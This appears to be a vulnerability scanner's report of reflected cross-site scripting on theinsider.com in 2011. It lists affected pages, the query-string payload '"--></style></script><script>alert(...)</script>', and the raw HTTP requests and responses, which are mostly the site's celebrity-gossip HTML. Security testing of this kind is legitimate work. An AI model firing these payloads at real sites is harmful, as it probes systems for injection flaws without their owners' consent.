Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:55:11 GMT
Content-Length: 11915
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Celebrity Photos | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="photos" /> <meta name="date" content="2011-10-21 18:55:00" /><meta property="og:title" content="Celebrity Photos | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/photos/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Celebrity Photos | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 18:55:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/photos;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/photos;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/photos;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Photos+Channel+Page+http://insdr.co/oyhDW2+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <!-- BELOW: gallery/cover.mc --><link rel="stylesheet" href="/css/jqm/jqm.css" type="text/css" /><link rel="stylesheet" href="/css/photos/photos.css" type="text/css" /><style>.view_number {text-align: center; font-size: 12px !important; font-weight: bold !important; line-height: 1.1;}</style> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/photos/"><img src="/media/img/channel_page_name_v3_photos.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"><div class='gallery_box box_spacer'><a href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html'><img src='/media/photo/2011/12/100456/robert_downey_jr_benny_benassi_425_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html'>Celeb Doppelgangers [Pics]</a></p><a style="text-decoration: none;" href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html'><div class='view_number'>View all 64 photos</div></a></div><div class='gallery_box box_spacer'><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100372/megan_fox_425_tcanham_124432726_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/gossip/39237_Before_They_Were_Famous/index.html'>Before They Were Famous</a></p><a style="text-decoration: none;" href='/gossip/39237_Before_They_Were_Famous/index.html'><div class='view_number'>View all 62 photos</div></a></div><div class='gallery_box box_spacer'><a href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html'><img src='/media/photo/2011/12/100331/sarah_jessica_parker_425_131207207_134862517_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html'>What's Going on Sarah Jessica Parker?!</a></p><a style="text-decoration: none;" href='/fashion/46995_What_s_Going_on_Sarah_Jessica_Parker/index.html'><div class='view_number'>View all 6 photos</div></a></div><div class='gallery_box box_spacer'><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100317/leann_rimes_julianne_hough_425_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'>The Good, the Bad and the Ugly</a></p><a style="text-decoration: none;" href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><div class='view_number'>View all 15 photos</div></a></div><div class='gallery_box box_spacer'><a href='/gossip/46990_Trevor_Project_Red_Carpet/index.html'><img src='/media/photo/2011/12/100222/neil_patrick_harris_david_burtka_425_134864596_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/gossip/46990_Trevor_Project_Red_Carpet/index.html'>Trevor Project: Stars Do Good, Look Good</a></p><a style="text-decoration: none;" href='/gossip/46990_Trevor_Project_Red_Carpet/index.html'><div class='view_number'>View all 15 photos</div></a></div><div class='gallery_box box_spacer'><a href='/gossip/40647_They_Dated_Surprising_Hookups/index.html'><img src='/media/photo/2011/12/100148/lara_flynn_boyle_eric_dane_425_98523801_57161619_pix.jpg' alt='' /></a><p class='gallery_headline'><a href='/gossip/40647_They_Dated_Surprising_Hookups/index.html'>Surprising Hookups</a></p><a style="text-decoration: none;" href='/gossip/40647_They_Dated_Surprising_Hookups/index.html'><div class='view_number'>View all 49 photos</div></a></div><div class='gallery_box box_spacer'><a href='/movies/46963_12_Must_See_December_Movies/index.html'><img src='/media/photo/2011/12/99945/425_thegirlwiththedragontattoo_111101_columbiapictures.JPG' alt='' /></a><p class='gallery_headline'><a href='/movies/46963_12_Must_See_December_Mov..
- /gossip/index.html

/gossip/index.html

http://www.theinsider.com/gossip/index.html?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00024A)</script>

Request

GET /gossip/index.html?'"--> HTTP/1.1
Referer: http://www.theinsider.com/search/index.html?sort=date-sdate
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:54:57 GMT
Content-Length: 10840
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="gossip" /> <meta name="date" content="2011-05-26 13:35:00" /><meta property="og:title" content="Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/gossip/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-05-26 13:35:00" /><Attribute name="sdate" value="20110526" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/gossip;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/gossip;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/gossip;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=Gossip+Channel+Page+http://insdr.co/rh3r7q+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/gossip/gossip.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}#channel_pagination_bar1 { background-color: #B5BB0F; box-shadow: 0 5px 15px #999999; height: 51px; margin-bottom: 15px; margin-left: -10px !important; width: 700px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/gossip/"><img src="/media/img/channel_page_name_v3_gossip.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_blank' href='http://www.etonline.com/music/116501_Scotty_McCreery_Wins_New_Artist_of_the_Year/index.html' class='black_text_link'><img src='/media/photo/2011/12/100484/scotty_mccreery_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_blank' href='http://www.etonline.com/music/116501_Scotty_McCreery_Wins_New_Artist_of_the_Year/index.html' class='black_text_link horizontal_excerpt'>'Idol' Winner Named New Artist of the Year</a></h4><p></p><a target='_blank' href='http://www.etonline.com/music/116501_Scotty_McCreery_Wins_New_Artist_of_the_Year/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_blank' href='http://www.etonline.com/tv/116499_Robert_Downey_Jr_Reveals_Baby_s_Gender/index.html' class='black_text_link'><img src='/media/photo/2011/12/100480/robert_downey_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_blank' href='http://www.etonline.com/tv/116499_Robert_Downey_Jr_Reveals_Baby_s_Gender/index.html' class='black_text_link horizontal_excerpt'>Robert Downey Jr.'s Having a ... </a></h4><p></p><a target='_blank' href='http://www.etonline.com/tv/116499_Robert_Downey_Jr_Reveals_Baby_s_Gender/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/gossip/39514_What_Happened_in_Vegas_This_Weekend_Pics/index.html' class='black_text_link'><img src='/media/photo/2011/12/100467/holly_madison_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/gossip/39514_What_Happened_in_Vegas_This_Weekend_Pics/index.html' class='black_text_link horizontal_excerpt'>Celebs Hit Las Vegas [Pics]</a></h4><p>What happens in Vegas doesn't always stay there.&nbsp; Click to see what all the celebs were up to in Sin City.</p><a target='_self' href='/gossip/39514_What_Happened_in_Vegas_This_Weekend_Pics/index.html' class='channel_more_link'>VIEW PHOTOS</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html' class='black_text_link'><img src='/media/photo/2011/12/100455/robert_downey_jr_benny_benassi_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html' class='black_text_link horizontal_excerpt'>Celeb Doppelgangers [Pics]</a></h4><p>Here are the doppelgangers of the stars.&nbsp; Click the pics to see if you agree that these celebs resemble one another!&nbsp;</p><a target='_self' href='/gossip/38451_Double_Take_Celebrity_Look_Alikes/index.html' class='channel_more_link'>VIEW PHOTOS</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/gossip/39237_Before_They_Were_Famous/index.html' class='black_text_link'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' /></a><div class='content_text horizon..
- /contributor/keltie_colleen/

/contributor/keltie_colleen/

http://www.theinsider.com/contributor/keltie_colleen/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3E..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000904)</script>

Request

GET /contributor/keltie_colleen/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/contributor/keltie_colleen/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=299
Date: Tue, 06 Dec 2011 06:56:44 GMT
Content-Length: 12134
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Keltie Colleen Channel Page | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="contributor_keltie_colleen" /> <meta name="date" content="2011-10-21 16:36:00" /><meta property="og:title" content="Keltie Colleen Channel Page" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/contributor/keltie_colleen/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Keltie Colleen Channel Page" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-10-21 16:36:00" /><Attribute name="sdate" value="20111021" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute 